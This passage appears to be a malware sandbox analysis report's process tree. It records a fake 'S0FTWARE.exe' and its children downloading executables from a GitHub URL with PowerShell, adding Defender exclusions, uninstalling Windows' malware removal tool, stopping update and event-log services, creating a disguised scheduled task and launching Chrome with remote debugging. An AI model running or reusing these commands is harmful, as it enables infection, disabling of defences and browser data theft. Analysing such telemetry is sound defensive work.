                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:3772
                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\pcfghvredizu\cjjuztwbgkj.exe'"
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                            PID:4920
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\pcfghvredizu\svrwkzmghj.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\pcfghvredizu\svrwkzmghj.exe"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:844
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:5568
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                  schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                  PID:5984
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\pcfghvredizu\cjjuztwbgkj.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\pcfghvredizu\cjjuztwbgkj.exe"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:1124
                                                                                                                                                                                                                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                  PID:4612
                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:3012
                                                                                                                                                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:2068
                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                      PID:3336
                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                      PID:2240
                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                      PID:3008
                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                      PID:5860
                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                      PID:2352
                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                                                                                      PID:3004
                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                                                                                      PID:2976
                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                                                                                      PID:4124
                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                                                                                      PID:5972
                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                      PID:5356
                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                      PID:4144
                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:4684
                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:3736
                                                                                                                                                                                                                                                    • C:\ProgramData\GoogleUP\Chrome\Updater.exe
                                                                                                                                                                                                                                                      C:\ProgramData\GoogleUP\Chrome\Updater.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:2456
                                                                                                                                                                                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                          PID:4460
                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:5432
                                                                                                                                                                                                                                                            • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                                                                              wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:5220
                                                                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                                                              PID:4568
                                                                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                                                              PID:5884
                                                                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                                                              PID:1452
                                                                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                                                              PID:5176
                                                                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                                                              PID:1628
                                                                                                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Power Settings
                                                                                                                                                                                                                                                              PID:5588
                                                                                                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Power Settings
                                                                                                                                                                                                                                                              PID:3252
                                                                                                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Power Settings
                                                                                                                                                                                                                                                              PID:5512
                                                                                                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Power Settings
                                                                                                                                                                                                                                                              PID:5356
                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\S0FTWARE.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\S0FTWARE.exe"
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:6108
                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\miqrn', 'C:\Users', 'C:\ProgramData'"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:3704
                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\miqrn', 'C:\Users', 'C:\ProgramData'"
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                    PID:216
                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\miqrn\wevfx.exe'"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:5632
                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\miqrn\wevfx.exe'"
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                      PID:5240
                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\miqrn\jmvtw.exe'"
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:2072
                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\miqrn\jmvtw.exe'"
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                        PID:5884
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\miqrn\wevfx.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\miqrn\wevfx.exe"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:380
                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Uses browser remote debugging
                                                                                                                                                                                                                                                                          PID:2644
                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff85ad5dcf8,0x7ff85ad5dd04,0x7ff85ad5dd10
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:4612
                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                            • Uses browser remote debugging
                                                                                                                                                                                                                                                                            PID:2276
                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff85ad5dcf8,0x7ff85ad5dd04,0x7ff85ad5dd10
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:5876
                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1544,i,10835082338863000998,5228984544409128643,262144 --variations-seed-version --mojo-platform-channel-handle=2624 /prefetch:3
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:2736
                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2536,i,10835082338863000998,5228984544409128643,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:2
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:5708
                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2064,i,10835082338863000998,5228984544409128643,262144 --variations-seed-version --mojo-platform-channel-handle=2760 /prefetch:8
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:4568
                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,10835082338863000998,5228984544409128643,262144 --variations-seed-version --mojo-platform-channel-handle=3272 /prefetch:1
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Uses browser remote debugging
                                                                                                                                                                                                                                                                                      PID:4700
                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,10835082338863000998,5228984544409128643,262144 --variations-seed-version --mojo-platform-channel-handle=3252 /prefetch:1
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Uses browser remote debugging
                                                                                                                                                                                                                                                                                      PID:1512
                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3840,i,10835082338863000998,5228984544409128643,262144 --variations-seed-version --mojo-platform-channel-handle=4436 /prefetch:1
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Uses browser remote debugging
                                                                                                                                                                                                                                                                                      PID:5868
                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5024,i,10835082338863000998,5228984544409128643,262144 --variations-seed-version --mojo-platform-channel-handle=5036 /prefetch:8
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:1560
                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5264,i,10835082338863000998,5228984544409128643,262144 --variations-seed-version --mojo-platform-channel-handle=5364 /prefetch:8
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:2372
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\miqrn\hieqg.exe'"
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:116
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\miqrn\hieqg.exe'"
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                          PID:3144
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\miqrn\jmvtw.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\miqrn\jmvtw.exe"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:3204
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:5284
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                PID:5472
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\miqrn\hieqg.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\miqrn\hieqg.exe"
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:2432
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:3480
                                                                                                                                                                                                                                                                                            • C:\ProgramData\GoogleUP\Chrome\Updater.exe
                                                                                                                                                                                                                                                                                              C:\ProgramData\GoogleUP\Chrome\Updater.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:3076
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                  PID:5316
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:3704
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:5216
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                                      PID:5336
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                                      PID:5640
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                                      PID:4316
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                                      PID:5860
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                                      PID:2352
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                                                                                                                                      PID:2072
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                                                                                                                                      PID:3348
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                                                                                                                                      PID:756
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                                                                                                                                      PID:4124
                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:3336
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\S0FTWARE.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\S0FTWARE.exe"
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:4696
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\yonnbsncv', 'C:\Users', 'C:\ProgramData'"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:2556
                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\yonnbsncv', 'C:\Users', 'C:\ProgramData'"
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                              PID:4236
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\yonnbsncv\fkskvyd.exe'"
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:5284
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
